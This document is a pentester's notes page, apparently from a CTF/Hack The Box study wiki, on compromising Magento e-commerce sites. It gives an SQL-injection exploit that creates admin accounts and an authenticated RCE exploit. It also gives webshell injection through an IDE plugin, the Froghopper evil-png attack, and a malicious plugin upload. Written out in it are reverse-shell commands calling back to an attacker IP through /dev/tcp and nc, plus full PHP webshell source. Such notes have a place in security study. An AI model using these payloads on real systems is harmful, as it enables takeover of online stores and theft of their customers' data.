Magento

Magento CMS

https://magento.com
Magento is an open-source e-commerce platform written in PHP
https://magento.com/blog/magento-news/magento-community-edition-1.9.1-now-available-download
https://docs.magento.com/m1/ce/user_guide/configuration/url-admin-custom.html

Scan

Magescan
https://github.com/steverobbins/magescan
Find Version, Files, Etc (local.xml might have passwords)
Find the Admin page: http://10.x.x.x/index.php/admin

> php magescan.phar scan:all 10.x.x.x

Create Admin

RCE 37977
Magento eCommerce- Remote code Execution-37977.py
Will create admin creds using a sql injection

searchsploit magento
Magento eCommerce- Remote code Execution-37977.py
vi 37977.py
target = http://10.x.x.x/
target_url = target + "/index.php/admin/CmsWysiwyg/directive/index/"

python 37977.py
http://swagshop.htb/index.php/admin/ 
Gives us Admin credentials!!
forme:forme

Authenticated RCE 37811

Must have Admin User/Pass for this to work
Must have install_date from '/app/etc/local.xml'
Lots of tweaks and errors to get this to work
https://joshuasuren.medium.com/hack-the-box-swagshop-write-up-18-1c18fecf885a

-------------------
Authenticated RCE: 37811.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution

vi 37811.py
username='forme'
password='forme'
install_date='Wed, 08 May 2019...'      ..from local.xml

-------------------
Errors:
ippsec used path to admin page to help:
python exec.py http://10.x.x.x/index.php/admin/ 'whoami' 

-------------------
Other bloggers updated:
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwdone = br.find_control(name="login[password]", nr=0)
pwdone.value = password

-------------------
More errors, had to update: from 72 > 2y
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
                                                 /\
-------------------
python 37811.py http://$IP "whoami"                     ..error
python 37811.py http://$IP/index.php/admin/ "whoami"    ..better
python 37811.py http://$IP/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.x.x.x/9001 0>&1'"

nc -nvlp 5555
whoami
www-data

Upload IDE

Requires Admin login
System > Magento Connect > Magento Connection Manager > Upload
Download: Magpleasure_Filesystem-1.0.0.tgz

---------------
http://$IP/index.php/admin/ 
Login with Admin

System > Magento Connect > Magento Connection Manager

Check Box: Put store on the maintenance mode while installing
Direct Package File Upload > Browse
Magpleasure_Filesystem-1.0.0.tgz
Upload!
nload:
http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz

---------------
System > Filesystem > IDE
Edit "Cron.php" 
Update it with an evil php webshell

Get your shell
http://10.x.x.x/cron.php

Submit a python reverse shell
nc -nvlp 4444
whoami
www-data

Froghopper Attack (RCE)

Requires Admin login
https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper
Upload an evil png with shellcode
Enable Symlinks
Edit Newsletter to call the payload

http://swagshop.htb/index.php/admin/ 
Login with Admin

-------------------
Create evil png

echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png

-------------------
System > Configuration > Advanced > Developer > Template Settings
Allow Symlinks: "Yes"

-------------------
Catalog > Manage
New Category > Manage Categories > Categories > Catalog
Thumbnail Image: Browse "shell.php.png"
http://10.x.x.x/media/catalog/category/shell.php.png   ..confirm it worked!

-------------------
Newsletter > Edit Newsletter Template
Add our code block to the "Template Content"
Save Template
Preview Template (to execute)
{{block type=’core/template’ template=’../../../../../../media/catalog/category/shell.php.png’}}

-------------------
Open template to execute the 'symlink' pointed to the evil-png

nc -nvlp 4444
whoami
www-data

Upload Evil Plugin

Requires Admin login
MAGento plugins are basically php file zipped.
Zip an evil php and upload it as a Plugin
Did not work for swagshopHTB

http://$IP/magmi/web/magmi.php
http://$IP/index.php/admin/Cms_Wysiwyg/directive/index/
http://$IP/index.php/admin/Cms_Wysiwyg/directive/key/905d7.../

-------------------
vi evil.php

<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
	  <input type='text' name='command' value=''/>
	  <input type='submit' value='execute'/>
	  </form>";

	if(function_exists('shell_exec')) {
	$command=$_POST['command'];
	$output = shell_exec("$command");
	echo "<pre>$output</pre>";
   }
}
else {
  echo "<form action='evil.php' method='post'>
	  <input type='text' name='command' value=''/>
	  <input type='submit' value='execute'/>
	  </form>";
}
?>

-------------------
> zip evil.zip evil.php

Upload new plugins:
click on "choose file" > evil.zip
 
-------------------
Execute:
http://10.x.x.x/magmi/plugins/evil.php

PreviousLocal File Inclusion (LFI)NextNagios

Last updated 2 years ago

Was this helpful?